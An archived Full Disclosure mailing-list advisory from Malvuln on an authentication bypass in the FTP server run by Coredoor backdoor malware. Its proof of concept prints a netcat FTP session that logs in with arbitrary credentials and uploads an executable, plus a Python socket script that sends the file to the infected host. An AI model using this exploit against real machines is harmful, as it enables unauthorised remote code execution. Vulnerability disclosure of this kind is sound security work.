[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [FD] Backdoor.Win32.Coredoor.10.a / Authentication Bypass
From:       malvuln <malvuln13 () gmail ! com>
Date:       2022-06-30 1:19:13
Message-ID: CAAHK0WTqJAizDs3q6ju26byWhQUVmsJDGHRwbPomjgd-dLzzEA () mail ! gmail ! com
[Download RAW message or body]

Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022
Original source:
https://malvuln.com/advisory/49da40a2ac819103da9dc5ed10d08ddb.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Coredoor.10.a
Vulnerability: Authentication Bypass
Description: The malware runs an FTP server on TCP port 21000. Third-party
attackers who can reach infected systems can logon using any
username/password combination. Intruders may then upload executables using
ftp PASV, STOR commands, this can result in remote code execution.
Family: Coredoor
Type: PE32
MD5: 49da40a2ac819103da9dc5ed10d08ddb
Vuln ID: MVID-2022-0618
Dropped files: CFS.EXE
Disclosure: 06/29/2022

Exploit/PoC:
C:\>nc64.exe 192.168.18.125 21000
220 c400s FTP Server read...
USER malvuln
331 Password required for malvuln.
PASS malvuln
230 User malvuln logged in.
SYST
215 UNIX Type: L8 Internet Component Suite
PASV
227 Entering Passive Mode (192,168,18,125,194,224).
STOR DOOM.exe
150 Opening data connection for DOOM.exe.
426 Connection closed; Cannot create file C:\temp\DOOM.exe.
CWD \Users
250 CWD command successful. "C:/Users/" is current directory.
PASV
227 Entering Passive Mode (192,168,18,125,195,94).
STOR DOOM.exe
150 Opening data connection for DOOM.exe.
226 File received ok


from socket import *

MALWARE_HOST="192.168.18.125"
PORT=50014
DOOM="DOOM.exe"

def doit():
    s=socket(AF_INET, SOCK_STREAM)
    s.connect((MALWARE_HOST, PORT))

    f = open(DOOM, "rb")
    EXE = f.read()
    s.send(EXE)

    while EXE:
        s.send(EXE)
        EXE=f.read()

    s.close()

    print("By Malvuln");

if __name__=="__main__":
    doit()


Disclaimer: The information contained within this advisory is supplied
"as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author. The author is not responsible for any misuse of the information
contained herein and accepts no responsibility for any damage caused by the
use or misuse of this information. The author prohibits any malicious use
of security related information or exploits by the author or elsewhere. Do
not attempt to download Malware samples. The author of this website takes
no responsibility for any kind of damages occurring from improper Malware
handling or the downloading of ANY Malware mentioned on this website or
elsewhere. All content Copyright (c) Malvuln.com (TM).
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic